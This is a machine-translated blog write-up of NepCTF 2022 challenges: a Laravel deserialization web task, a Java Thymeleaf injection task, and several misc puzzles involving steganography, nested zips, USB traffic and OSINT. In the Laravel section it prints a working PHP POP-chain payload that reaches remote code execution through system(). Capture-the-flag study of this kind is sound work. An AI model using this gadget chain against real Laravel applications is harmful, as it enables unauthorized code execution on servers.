当前位置:网站首页>[nepctf2022] recurrence
[nepctf2022] recurrence
2022-07-21 00:08:00 【ThnPkm】
Just Kidding
Naughty HRP use Laravel I wrote a project to welcome everyone to play Nepctf 2nd, little does one think … Unexpectedly, he was killed by bad guys Sharun Pout
www.zip Source code leakage , I didn't understand anything and didn't pay attention to where the right entrance is , Always focus on web.php above
Didn't notice here use The path of the imported class , Follow the path to find the deserialization entry
The process of writing at that time , exactly 9.12.2 The version of is also circulated online 9.1.8 Your chain can be hit ,
At that time, I just didn't find the right entrance and path
https://github.com/1nhann/vulns/issues
pop1, direct rce
<?php
namespace Illuminate\Contracts\Queue{
interface ShouldQueue
{
//
}
}
namespace Illuminate\Bus{
class Dispatcher{
protected $container;
protected $pipeline;
protected $pipes = [];
protected $handlers = [];
protected $queueResolver;
function __construct()
{
$this->queueResolver = "system";
}
}
}
namespace Illuminate\Broadcasting{
use Illuminate\Contracts\Queue\ShouldQueue;
class BroadcastEvent implements ShouldQueue {
function __construct()
{
}
}
class PendingBroadcast{
protected $events;
protected $event;
function __construct()
{
$this->event = new BroadcastEvent();
$this->event->connection = "ls /";
$this->events = new \Illuminate\Bus\Dispatcher();
}
}
}
namespace{
$a = new \Illuminate\Broadcasting\PendingBroadcast();
echo base64_encode(serialize($a));
}
Be careful payload route , After the upload Visit the source code to see the success rce Echo of
Challenger
Naughty HRP Another language is used to write the project to welcome you , I didn't expect to let Sharun Dig
java Framework , Give it to jar, Decompile
I haven't learned java, So follow wp Go over , It's also a chain fight on the Internet
Java Safety Thymeleaf Template injection analysis - nice_0e3 - Blog Garden
Sign in problem
binwalk Separate pictures
Get the compression package doll
import zipfile
a=""
for i in range(232,2,-1):
a=str(i)+".zip"
print(a)
with zipfile.ZipFile(a) as zf:
zf.extractall()
Extract the script from brother Peng , Decompress to the end
Originally looking for the password explosion , In fact, it is pseudo encryption
Look at the file name and you know it's keyboard traffic
Wang Yihang Usb Script shuttle
rare base
There is only one attachment jpg I tried it and put it down without any information , I didn't expect to sign in
JPHS This tool is rarely used and I forget , No password directly seek It's coming out.
base58
Huahua painting Huahua
After the attachment is downloaded It's a osz suffix , Then used 010 Look at the header of the compressed package , Just change the suffix ....
Open it correctly osz file
osu open , This is a music game ,
Pie ? trap !
There is a license plate in the lower right corner, Joan , I didn't find it when I wrote , Shangdeyuan tea Locate Sanya It happened to be here
In the upper left corner is the bank
边栏推荐
- Postgetsql set ID auto increment primary key
- 「架构师合集」
- Helm introduction
- 144. Preorder traversal of binary tree
- Component architecture project construction - gradle unified, dependent management and configuration
- Data center, a new type of infrastructure that determines the driving force of the city's future development
- matplotlib的savefig必须在show之前
- YOLOv5训练自己的voc数据集
- 数据仓库中的元数据管理!
- Perfect integration into cloud native codeless platform IVX editor practice
猜你喜欢
完美融入云原生的无代码平台 iVX编辑器实战
商业智能BI分析思维:生产制造行业的资金管理
重新认识生命世界,也重新认识我们自己
Why do you say that the maximum single table of MySQL database is 20million? Based on what?
It's just a TCC distributed transaction. Is it so difficult?
深度参与 openGauss Developer Day 2022,云和恩墨在多项活动中展风采
不就是个TCC分布式事务,有那么难吗?
[NepCTF2022] 复现
基于短期的风力发电概率预测(Matlab代码实现)
支付宝 alipay.fund.trans.uni.transfer(单笔转账接口)功能整合
随机推荐
NFT in the eyes of blackash: the platform is crying for slaughter, and users send money to the door
Golang — RESTful框架 go-restful
Prometheus has released the long-term supported version of LTS
awk 统计平均 最大 最小值
组件化架构项目搭建——Gradle统一、依赖管理与配置
Bi analytical thinking of business intelligence: Capital Management in manufacturing industry
Component architecture project construction - gradle unified, dependent management and configuration
《PyTorch深度学习实践》学习笔记:循环神经网络(基础篇)
Siemens low code customer case | overcome communication barriers and solve the bottleneck of application development efficiency
股票开户网上办理的话安全吗。股票开户去哪里。
【Py】对字典进行join连接操作
Revit(22)FamilyInstance-常见的API封装
基于短期的风力发电概率预测(Matlab代码实现)
flv. JS load video stream
3.JS基础
【汇总】百宝囊
Read through the white paper on business security - four trends in the future
C语言基础演练(6)
ES6 - promise vs function "callback hell"
洛谷P5250 木材仓库